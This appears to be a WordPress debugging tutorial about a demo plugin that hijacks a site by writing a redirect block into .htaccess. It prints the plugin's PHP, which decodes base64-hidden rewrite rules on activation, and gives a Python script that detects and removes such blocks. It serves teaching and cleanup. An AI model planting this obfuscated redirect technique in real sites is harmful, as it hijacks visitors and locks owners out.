Spam redirect: Hacked .htaccess

Install and activate the attached plugin. Download Zip –

Expected Outcome

When activated, you are immediately redirected to a different site. You cannot go back to your site at all. Ever.


How to fix

The first step is, of course, to delete this plugin. However, even after doing so, you still can’t get back to your site.

Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:

# BEGIN I Love DC
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^.*$ [L,R=301]
</IfModule>
# END I Love DC

(If you are running WordPress out of its own directory, the .htaccess will be in that folder. So if this site is in /home/user/, the .htaccess would be there.)

Once you delete that section from your .htaccess, the ‘hack’ goes away.
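The cleanup step above can be scripted. The following is an added example, not part of the original page or of WordPress: it walks the `# BEGIN` / `# END` marker blocks in a .htaccess file, flags any block whose marker name is not expected and which contains a redirecting RewriteRule, and returns the file with those blocks removed. The allowlist, the function name and the sample file (including the spam.example target) are assumptions made up for the example; rules outside marker blocks are not examined.

```python
import re

KNOWN_MARKERS = {"WordPress"}  # assumption: the only marker block this site expects
BEGIN = re.compile(r"^\s*# BEGIN (.+?)\s*$")
END = re.compile(r"^\s*# END (.+?)\s*$")
# A RewriteRule whose flag list carries an R (external redirect) flag, e.g. [L,R=301]
REDIRECT = re.compile(r"^\s*RewriteRule\s.*\[[^\]]*\bR\b[^\]]*\]\s*$", re.I)

# Constructed sample; spam.example is a placeholder redirect target.
SAMPLE = """# BEGIN I Love DC
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^.*$ https://spam.example/ [L,R=301]
</IfModule>
# END I Love DC
# BEGIN WordPress
RewriteRule . /index.php [L]
# END WordPress
"""

def audit_htaccess(text, known=KNOWN_MARKERS):
    """Return (suspicious marker names, text with those blocks removed)."""
    kept, block, name, suspicious = [], [], None, []

    def flush():
        # Close the current block: drop it if unknown and redirecting, else keep it.
        nonlocal block, name
        if name not in known and any(REDIRECT.match(l) for l in block):
            suspicious.append(name)
        else:
            kept.extend(block)
        block, name = [], None

    for line in text.splitlines():
        begin, end = BEGIN.match(line), END.match(line)
        if name is None and begin:
            name, block = begin.group(1), [line]
        elif name is not None:
            block.append(line)
            if end and end.group(1) == name:
                flush()
        else:
            kept.append(line)  # lines outside any marker block pass through
    if name is not None:  # BEGIN without a matching END: judge what was collected
        flush()
    return suspicious, "\n".join(kept) + "\n"
```

Review the returned marker names before writing the cleaned text back, and keep a copy of the original file.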


Understanding what happened

The code of the plugin itself is very simple. The plugin contains no useful code at all; all it does is call insert_with_markers(), the function WP itself (legitimately) uses to add .htaccess rules.

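class ILoveDCPlugin {
    // Runs once, when the plugin is activated.
    static function install() {
        $htaccess = trailingslashit(ABSPATH).'.htaccess';
        // The rules are hidden as base64 (the string is cut off on this page).
        $data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg');
        // Writes the decoded lines between "# BEGIN I Love DC" and "# END I Love DC".
        insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));
    }
}

register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );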

When a plugin uses base64_decode(), things are almost always a little nefarious. Base64 is an encoding, not encryption, so you can decode the string with a tool such as Coderstoolbox, and it translates directly to the .htaccess rules we saw.

Long term, the fix is to delete the plugin and never ever use it again.
